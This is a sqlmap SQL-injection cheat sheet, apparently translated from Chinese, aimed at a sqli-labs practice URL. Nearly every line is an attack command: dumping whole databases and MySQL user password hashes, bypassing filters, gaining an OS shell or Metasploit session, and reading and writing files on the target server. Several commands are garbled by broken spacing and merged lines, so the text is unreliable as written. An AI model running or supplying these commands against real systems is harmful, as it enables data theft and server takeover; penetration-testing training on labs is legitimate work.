Sqlmap injection common commands

sqlmap -r http.txt #http.txt is the http request package we grabbed
sqlmap -r http.txt -p username #Specify the parameters, when there are multiple parameters and you know that the username parameter has a SQL vulnerability, you can Use -p to specify the parameters to detect
sqlmap -u "http://www.xx.com/username/admin*" #If we already know that admin is the injection point, we can add a * after it to let sqlmap do it Inject
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"
#Detect whether the url has a vulnerability sqlmap -u "http://192.168.10.1/sqli/Less-1/? id=1" --cookie="Grabbed cookie" #When the website needs to log in, detect whether the URL is vulnerable
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1 "--data="uname=admin&passwd=admin&submit=Submit"
#Grab the data submitted by its post and fill in sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users
#View all users in the database sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #View the password of the database user name.
Sometimes you can't get the password with --passwords, you can try
-D mysql -T user -C host,user,password --dump when MySQL<5.7
-D mysql -T user -C host,user,authentication_string --dump when MySQL>=5.7
sqlmap -u "http:/ /192.168.10.1/sqli/Less-1/?id=1" --current-user #View the current user
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #Judging whether the current user has administrator rights
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #List all database administrator roles, only When applicable to oracle database,
 
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs #burst all databases
sqlmap -u "http://192.168.10.1/ sqli/Less-1/?id=1" --tables #Breaking out all data tables
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns #Breaking out All columns in the database
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #View the current database
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #Explode all tables in the database security
sqlmap -u "http://192.168.10.1 /sqli/Less-1/?id=1" -D security -T users --columns #Explore all the columns in the users table in the security database
sqlmap -u "http://192.168.10.1/sqli/Less- 1/?id=1" -D security -T users -C username --dump #burst out all the data in the username column in the users table in the database security
sqlmap -u "http://192.168.10.1/sqli/ Less-1/?id=1" -D security -T users -C username --dump --start 1 --stop 100 #Breaking out the first 100 data in the username column of the users table in the database security
 
sqlmap- u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all #burst out all the data in the users table in the database security
sqlmap -u "http ://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all #burst all data in the database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all #burst out all the data in the database
 
sqlmap -u "http://192.168.10.1/sqli /Less-1/?id=1" --tamper=space2comment.py #Specify the script to filter, use /**/ instead of spaces
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id =1" --level=5 --risk=3 #Detection level 5, platform risk level 3, both are the highest level. When level=2, cookie injection will be tested. When level=3, user-agent/referer injection will be tested.
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell #Execute the specified sql statement
sqlmap -u "http://192.168.10.1/sqli/Less- 4/?id=1" --os-shell/--os-cmd #Execute the --os-shell command to obtain the permission of the target server
sqlmap -u "http://192.168.10.1/sqli/Less-4/? id=1" --os-pwn #Execute the --os-pwn command to pop the target authority to MSF
 
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" - file-read "c:/test.txt" #Read the test.txt file in the C drive of the target server
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-write test.txt --file-dest "e:/hack.txt" #The local test. The txt file is uploaded to the E drive of the target server, and the name is hack.txt
 
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --dbms="MySQL" #Specify it The database is mysql and 
other databases: Altibase, Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft Access, Microsoft SQL Server, MimerSQL, MonetDB, MySQL, Oracle, PostgreSQL, Presto, SAP MaxDB, SQLite, Sybase, Vertica, eXtremeDB
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --random-agent
#Use any User-Agent to blast sqlmap- u "http://192.168.10.1/sqli/Less-4/?id=1" --proxy="http://127.0.0.1:8080" #Designated proxy
can be used if there is a timeout when blasting HTTPS websites Parameters --delay=3 --force-ssl
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --technique T #Specify time delay injection, this parameter can specify the detection technology used by sqlmap, by default it will test all The way, of course, we can also directly specify manually.
The supported detection methods are as follows:
　　B: Boolean-based blind SQL injection (Boolean injection)
　　E: Error-based SQL injection (error reporting type injection)
　　U: UNION query SQL injection (joint query injection)
　　S: Stacked queries SQL injection ( Multi-statement query injection is possible)
　　T: Time-based blind SQL injection (based on time delay injection)
  
sqlmap -d "mysql://root:[email protected]:3306/mysql" --os-shell #Know the website account Password direct connection
 
-v3 #output detail degree maximum 5 will display request packet and reply packet
--threads 5
#specified number of threads --fresh-queries #clear cache
--flush-session
#empty session, reconstruction injection  --batch
#The default for all interactive --random-agent #Any http header
--tamper base64encode #Base64-encode the submitted data
--referer http://www.baidu.com #Forgery referer field
 
--keep-alive Keep the connection, when [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s) When you are wrong, use this parameter